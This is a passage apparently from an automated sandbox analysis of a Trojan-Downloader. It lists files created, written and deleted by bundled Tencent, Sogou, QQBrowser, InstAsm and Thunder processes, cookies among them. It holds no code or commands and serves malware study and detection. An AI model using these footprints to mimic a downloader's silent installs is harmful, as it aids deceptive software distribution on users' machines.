%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1111.dat (6 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\BlueList.lis (28 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QQPCClinicSys\QQPCClinicSys.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SncLib.dat (264 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMSysRepLibDown.dat (12 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMIpc.dll (3202 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\Modules.xml (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMSignScan.exe (3204 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1001.dat (7 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1073.dat (7 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMTrayPlugin.xml (5 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_10484.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\GameSpeedupAppPlugins\QMGamePackagePlugin\QMGamePackagePlugin.dll (3914 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\GameBoxPlugin.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1019.dat (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\AMD64.Microsoft.VC80.CRT\8.0.50727.4053.cat (7 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TsNetMonWfp.sys (363 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\HPScannerPlugin\QMHPGarbageScan\QMHPGarbageScan.dll (3874 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAO\XYConfig.etf (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\GarbageCleaner.dll (9707 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\adfilterlib\AdFilterConfigFile.xml (5 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\GF.dll (17954 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\GarbageCleanerScript.dat (40 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\pic\sCheck_Router.png (5 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\SysSpeedUp\sysspeedup.tpc (655 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMIEProtectIo.dll (41 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMSysRepProv.dll (17989 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1401.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMon\GFCustom.dll (7112 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\IEStartPage\browserlist.dat (13 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\libexpatw.dll (712 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSZip.dll (647 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\exnscan.dll (3547 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCAVSetting.dat (696 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPConfig.exe (2049 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1020.dat (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\HPScannerPlugin\HPSysScan\HPSysScanner.dll (2399 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMAccountProtection.exe (10398 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_10.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QuickOpenLogo\QMHealthAssist_QO.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\IEStartPage\IEStartPage.tpc (707 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\FtsysSoftIcon.dll (2098 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QuickOpenLogo\QMGameSpeedup_QO.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\qmavtrayplugin\QMShield32.png (578 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCRealTimeSpeedup.rdb (241 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMSSO\Bin\SSOCommon.dll (10861 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\RemNPX.exe (1764 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\HPScanUIPlugin\HPScanUIPlugin.dll (6633 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\GameSpeedupAppPlugins\QMHardwareDetectPlugin\Config\harddiskmark.etf (40 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCLeakScan.exe (7366 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\InstAsm.exe (1137 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAVPedc.dll (2205 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\data\speech.dat (91 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQFileFlt.dll (838 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\StartupMgr\StartupMgr.rdb (9005 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\PluginPackage\InstallCfg.xml (156 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMStartupMonitorNotify\QMStartupMonitorNotify.tpc (905 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\oDayProtect.dll (86 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMon\Common.dll (17134 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1031.dat (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1223.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCRealTimeSpeedup.exe (6074 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCHW-x64.sys (512 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\xImage.dll (2533 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QMAdFilter.png (545 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\pic\sBoth_Disconnected.png (10 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\IEStartPage\supplyID.xml (266 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\RtpPage\RtpPage.tpc (674 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1402.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TVL00001.tvl (6396 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSUrlLib.DAT (15 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\sm03.dat (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\pic\TurnOnAdapter.png (17 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QMNetConnect.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\data\pinyin.lis (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1603.dat (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TestStubConfig.xml (425 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QQPCWifiSafe\arkGraphic.dll (5320 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\com.qq.qmchext.json (209 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\xImage.dll (4051 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\tssk.sys (1616 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\Tencentdl.exe (9871 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1030.dat (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\tpk\1.0.0.1\def\virdex02.def (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_10007.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMIESafeDll.dll (2233 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMSSO\I18N\2052\PGFStringBundle.xml (6 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_1944.png (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\QQPCUpdate.dat (656 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1095.dat (452 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCMgr.exe (601 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\tsvulsha.dat (109 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSWebShieldInject.dll (1172 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QQPCClinic.png (931 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMBDScanner.dat (35 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMNewsTips\QMNewsTips.rdb (22 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\RocketConfig.etf (406 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\HPScannerPlugin\HPExternalScan\HPFirewareScanner.dll (2370 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QQPCClinicSys.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\qqpclaunch\QQPCLaunch.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAOKernel.sys (852 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\DownloaderMgrUI\DownloaderMgrUI.rdb (3744 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_157.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\Microsoft.VC80.ATL\ATL80.dll (1915 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\libjpegturbo.dll (4099 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMClinicCore.dll (9313 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetflowOpti\NetflowOpti.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMDns.dll (62 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMTPKTrayPlugin\QMTpkTrayPlugin.dll (1875 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCVulPage.rdb (1812 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\FileSmash\xImage.dll (2643 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\MalwareLogic.dll (2064 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCSoftCmd.exe (3473 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_115.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\jgIOStub.dll (14 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_1755.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\DownloaderInfo.dat (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\DLProtectComm.dll (1722 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAO\CODConfig.etf (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_10482.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMGameAssistant.rdb (16 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\Image\net_err.jpg (15 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMSysOptimizeAssist\QMSysOptimizeAssist.dll (5038 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_657.png (794 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCAVSetting.exe (7102 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\SoftUninstall\SoftUninstall.dll (5765 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\LoadError.html (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCSoftTrayTips.rdb (492 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCLeakScan.dat (704 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1415.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\qmsoftmgrupdate\QMSoftMgrUpdate.dll (2641 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\UDiskShellExt.dll (2502 bytes)

The Trojan-Downloader deletes the following file(s):

%Documents and Settings%\All Users\Application Data\Tencent\QQPCMgr\QQPCMgrInstall_20160519101428.Log (0 bytes)

The process SogouSoftware.exe:216 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\SogouSoftware\data\cache\LocalInfo.xml (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SuiteDownloader20160222153349.exe (152096 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S9EV8X6B\381427456234840[1].jpg (10332 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S9EV8X6B\link[4].png (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXEFKT6V\ie-css3[1].htc (1115 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49UBGDUB\link[3].png (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S9EV8X6B\link[1].jpg (3208 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\C9MJ0H6Z\link[3].png (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S9EV8X6B\link[3].png (10542 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXEFKT6V\imagick[1].jpg (696 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[2].txt (1283 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S9EV8X6B\link[2].png (1367 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\C9MJ0H6Z\link[1].png (2084 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S9EV8X6B\link[1].png (6666 bytes)
%Documents and Settings%\%current user%\Application Data\SogouSoftware\data\cache\PCID.xml (685 bytes)
%Documents and Settings%\%current user%\Application Data\SogouSoftware\data\sogousoftware.db (149 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49UBGDUB\scroll[1].js (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXEFKT6V\link[4].png (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49UBGDUB\loading[1].gif (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\C9MJ0H6Z\SuiteDownloader20160222153349[1].exe (304936 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[1].txt (1139 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49UBGDUB\link[4].png (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXEFKT6V\jquery-1.11.1.min[1].js (50457 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXEFKT6V\link[3].png (392 bytes)
%Documents and Settings%\%current user%\Application Data\SogouSoftware\data\cache\SilentParaReponse.xml (97 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXEFKT6V\link[2].png (5665 bytes)
%Documents and Settings%\%current user%\Application Data\SogouSoftware\data\sogousoftware.db-journal (86 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXEFKT6V\link[1].png (2675 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\C9MJ0H6Z\ranking-ico[1].png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\C9MJ0H6Z\jquery-1.7.2.min[1].js (45457 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (160 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S9EV8X6B\ie-css3[1].htc (1012 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXEFKT6V\741430117543639[1].png (22752 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXEFKT6V\ranking-ico[1].png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49UBGDUB\link[2].png (6423 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49UBGDUB\link[1].png (400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SG.jpeg (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\C9MJ0H6Z\recommend[1].css (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S9EV8X6B\SogouSoftwareExternalApp[1].exe (1006360 bytes)
%Documents and Settings%\%current user%\Application Data\SogouSoftware\data\cache\NewVersionReponse.xml (1 bytes)
%Program Files%\SogouSoftware\tmp\ExternalApp.exe (595769 bytes)
%Documents and Settings%\%current user%\Application Data\SogouSoftware\data\cache\OnlineIconReponse.xml (359 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (1940 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S9EV8X6B\CC1430117533187[1].png (14468 bytes)
%Documents and Settings%\%current user%\Application Data\2320808333768086190_4848.jpeg (7 bytes)
%Documents and Settings%\%current user%\Application Data\SogouSoftware\data\cache\SoftInfo.xml (809 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\C9MJ0H6Z\link[2].png (1622 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49UBGDUB\ranking[1].css (73 bytes)

The Trojan-Downloader deletes the following file(s):

%Documents and Settings%\%current user%\Application Data\SogouSoftware\data\sogousoftware.db-journal (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXEFKT6V\link[1].png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\C9MJ0H6Z\ranking-ico[1].png (0 bytes)
%Program Files%\SogouSoftware\tmp\ExternalApp.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49UBGDUB\link[1].png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S9EV8X6B\ie-css3[1].htc (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXEFKT6V\ranking-ico[1].png (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXEFKT6V\link[2].png (0 bytes)

The process QQBrowserLiveup.exe:1808 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Liveup\UpdateFiles\QQBrowser_Setup_9.4.7658.400_9.4.exe.qbl (16424 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Liveup\Temp\F1Assistant.dll (19686 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Liveup\UpdateFiles\desc.txt (1 bytes)

The Trojan-Downloader deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Liveup\UpdateFiles\QQBrowser_Setup_9.4.7658.400_9.4.exe.qbl (0 bytes)

The process InstAsm.exe:3332 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%WinDir%\WinSxS\InstallTemp\732509\Manifests (4 bytes)
%WinDir%\WinSxS\InstallTemp\776418\amd64_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_18a05f69\msvcm80.dll (3073 bytes)
%WinDir%\WinSxS\InstallTemp\776418\Manifests\amd64_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_18a05f69.cat (7 bytes)
%WinDir%\WinSxS\InstallTemp\842843\Policies\x86_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_x-ww_77c24773\8.0.50727.4053.Policy (804 bytes)
%WinDir%\WinSxS\InstallTemp\842843\Policies\x86_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_x-ww_77c24773 (4 bytes)
%WinDir%\WinSxS\InstallTemp\825721\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989\msvcp80.dll (3361 bytes)
%WinDir%\WinSxS\InstallTemp\816749\Policies\x86_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_x-ww_5f0bbcff (4 bytes)
%WinDir%\WinSxS\InstallTemp\806309\x86_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_473666fd\ATL80.dll (601 bytes)
%WinDir%\WinSxS\InstallTemp\800656\Policies\amd64_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_x-ww_d780e993\8.0.50727.4053.Policy (808 bytes)
%WinDir%\WinSxS\InstallTemp\806309\Manifests (4 bytes)
%WinDir%\WinSxS\InstallTemp\800656\Policies\amd64_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_x-ww_d780e993 (4 bytes)
%WinDir%\WinSxS\InstallTemp\776418\Manifests\amd64_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_18a05f69.Manifest (1 bytes)
%WinDir%\WinSxS\InstallTemp\800656\Policies\amd64_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_x-ww_d780e993\8.0.50727.4053.cat (7 bytes)
%WinDir%\WinSxS\InstallTemp\776418\amd64_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_18a05f69\msvcr80.dll (5873 bytes)
%WinDir%\WinSxS\InstallTemp\825721\Manifests (4 bytes)
%WinDir%\WinSxS\InstallTemp\732509\Manifests\amd64_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_79404cdd.cat (7 bytes)
%WinDir%\WinSxS\InstallTemp\806309\Manifests\x86_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_473666fd.Manifest (466 bytes)
%WinDir%\WinSxS\InstallTemp\776418\amd64_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_18a05f69\msvcp80.dll (7433 bytes)
%WinDir%\WinSxS\InstallTemp\825721\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989\msvcr80.dll (4185 bytes)
%WinDir%\WinSxS\InstallTemp\732509\amd64_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_79404cdd\ATL80.dll (601 bytes)
%WinDir%\WinSxS\InstallTemp\761294\Policies\amd64_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_x-ww_beca5f1f\8.0.50727.4053.Policy (808 bytes)
%WinDir%\WinSxS\InstallTemp\761294\Policies\amd64_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_x-ww_beca5f1f (4 bytes)
%WinDir%\WinSxS\InstallTemp\732509\Manifests\amd64_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_79404cdd.Manifest (468 bytes)
%WinDir%\WinSxS\InstallTemp\761294\Policies\amd64_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_x-ww_beca5f1f\8.0.50727.4053.cat (7 bytes)
%WinDir%\WinSxS\InstallTemp\806309\Manifests\x86_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_473666fd.cat (7 bytes)
%WinDir%\WinSxS\InstallTemp\816749\Policies\x86_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_x-ww_5f0bbcff\8.0.50727.4053.cat (7 bytes)
%WinDir%\WinSxS\InstallTemp\825721\Manifests\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989.cat (7 bytes)
%WinDir%\WinSxS\InstallTemp\776418\Manifests (4 bytes)
%WinDir%\WinSxS\InstallTemp\816749\Policies\x86_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_x-ww_5f0bbcff\8.0.50727.4053.Policy (804 bytes)
%WinDir%\WinSxS\InstallTemp\825721\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989\msvcm80.dll (3073 bytes)
%WinDir%\WinSxS\InstallTemp\825721\Manifests\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989.Manifest (1 bytes)
%WinDir%\WinSxS\InstallTemp\842843\Policies\x86_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_x-ww_77c24773\8.0.50727.4053.cat (7 bytes)

The Trojan-Downloader deletes the following file(s):

%WinDir%\WinSxS\InstallTemp\825721 (0 bytes)
%WinDir%\WinSxS\InstallTemp\732509\Manifests (0 bytes)
%WinDir%\WinSxS\InstallTemp\816749 (0 bytes)
%WinDir%\WinSxS\InstallTemp\842843\Policies\x86_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_x-ww_77c24773 (0 bytes)
%WinDir%\WinSxS\InstallTemp\816749\Policies\x86_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_x-ww_5f0bbcff (0 bytes)
%WinDir%\WinSxS\InstallTemp\806309 (0 bytes)
%WinDir%\WinSxS\InstallTemp\761294 (0 bytes)
%WinDir%\WinSxS\InstallTemp\732509 (0 bytes)
%WinDir%\WinSxS\InstallTemp\816749\Manifests (0 bytes)
%WinDir%\WinSxS\InstallTemp\806309\Manifests (0 bytes)
%WinDir%\WinSxS\InstallTemp\800656\Policies\amd64_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_x-ww_d780e993 (0 bytes)
%WinDir%\WinSxS\InstallTemp\761294\Policies (0 bytes)
%WinDir%\WinSxS\InstallTemp\800656\Manifests (0 bytes)
%WinDir%\WinSxS\InstallTemp\825721\Manifests (0 bytes)
%WinDir%\WinSxS\InstallTemp\800656 (0 bytes)
%WinDir%\WinSxS\InstallTemp\776418 (0 bytes)
%WinDir%\WinSxS\InstallTemp\761294\Policies\amd64_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_x-ww_beca5f1f (0 bytes)
%WinDir%\WinSxS\InstallTemp\816749\Policies (0 bytes)
%WinDir%\WinSxS\InstallTemp\842843\Manifests (0 bytes)
%WinDir%\WinSxS\InstallTemp\761294\Manifests (0 bytes)
%WinDir%\WinSxS\InstallTemp\776418\Manifests (0 bytes)
%WinDir%\WinSxS\InstallTemp\842843 (0 bytes)
%WinDir%\WinSxS\InstallTemp\800656\Policies (0 bytes)
%WinDir%\WinSxS\InstallTemp\842843\Policies (0 bytes)

The process MiniThunderPlatform.exe:2060 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Application Data\Thunder Network\DownloadLib\pub_store.dat (405 bytes)
